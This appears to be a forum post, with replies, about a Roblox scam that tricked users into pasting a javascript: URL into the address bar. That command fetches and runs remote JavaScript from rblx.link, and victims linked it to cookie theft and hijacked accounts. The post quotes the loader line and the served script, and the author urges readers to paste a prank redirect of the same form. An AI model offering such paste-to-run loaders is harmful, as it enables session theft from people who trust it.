Getting revenge on a Roblox hacker
(This post contains malicious JS code! Only run things if you absolutely know what it does!)
I was just browsing Roblox one day when I get the following message from a user I'd never seen before:
Already, I knew this was a scam of some sort. But, I followed the YT link out of curiosity. On there, it tells you to paste in something into the URL bar:
+javascript:$.get('//rblx.link:3000/1')
With my limited knowledge of JS, I managed to figure out what this code did.
javascript:: This stuff should be run as JS code$.get: Using jQuery (I'm assuming) call an HTTP GET request//rblx.link:3000/1: Some kind of link (this will be important)
So, it GETs some data from rblx.link and runs it as JS. But what is this link? I followed it, and all it did was show some code:
// Avatar Texture Downloader script // @WebGL3D // 2020-06-04 // Chain of requests that allows us to get the texture hash var hash = (await (await fetch((await (await fetch("https://www.roblox.com/avatar-thumbnail-3d/json?userId=" + $("meta[name='user-data']").data("userid"))).json()).Url)).json()).textures[0] // Calculate ID of CDN from hash for (var i = 31, t = 0; t < 32; t++) i ^= hash[t].charCodeAt(0); // Redirect to avatar texture url location.href = "https://t" + (i % 8).toString() + ".rbxcdn.com/" + hash
On its own, this doesn't look like anything malicious. However, it was revealed that somehow there was a cookie logger associated with the link. I'm not entirely sure how this logger works or where it is, but many people reported that after using this code, their accounts were hacked and replaced with Trump 2020 stuff. I'll admit, I had also found my account like this a week ago, but I never ran the code. Strange, innit?
Anyways, I wanted to get some harmless revenge on whoever did this. I decided to create something similar to the JS that was posted, but make it not track your cookies. I made the Repl below, then posted this comment on the video:
If you run my snippet (It's safe, don't worry!) you can see what it does for yourself :)
Just paste the contents below into the URL bar and remove the + sign. This must be done on a site, not on a new tab.
+javascript:location.href="//rbxavatar--sixbeeps.repl.co"
it just say cant play video
It's incredible how easy it is these days to hack all items that have an internet connection. I, by the way, am also part of this Roblox aimbot ( https://guidedhacking.com/threads/lua-roblox-aimbot.17490/ ) study for personal use. A hacker is an excellent system programmer: he works at the system kernel or driver level, and the application programmers write user programs. I am constantly convinced of this. For hackers, the goal is more important than the money. And what they do is a game: if a hacker is not interested in or not comfortable doing something, he will not do it, and promises of "golden mountains" and "manna from heaven" do not work for them.
it's quite interesting! I have just started studying this topic, but I can already say that I really like it.
dud you have no F*cking Idea what that thing does. I found a Minecraft hacked client that was proven to have a hidden backdoor and I know what it does.
(sorry for necroposting) If you want to know more about this scam I found this blog post: https://petabyte.heb12.com/blog/?post=27
BEST. ROLL. EVER.
Also, real haxxors could steal ur info
Dont work for me
This is what i get https://www.youtube.com/watch?v=dQw4w9WgXcQ
Damn, those ads really ruins it
Bro what it just sends me to this https://www.youtube.com/watch?v=dQw4w9WgXcQ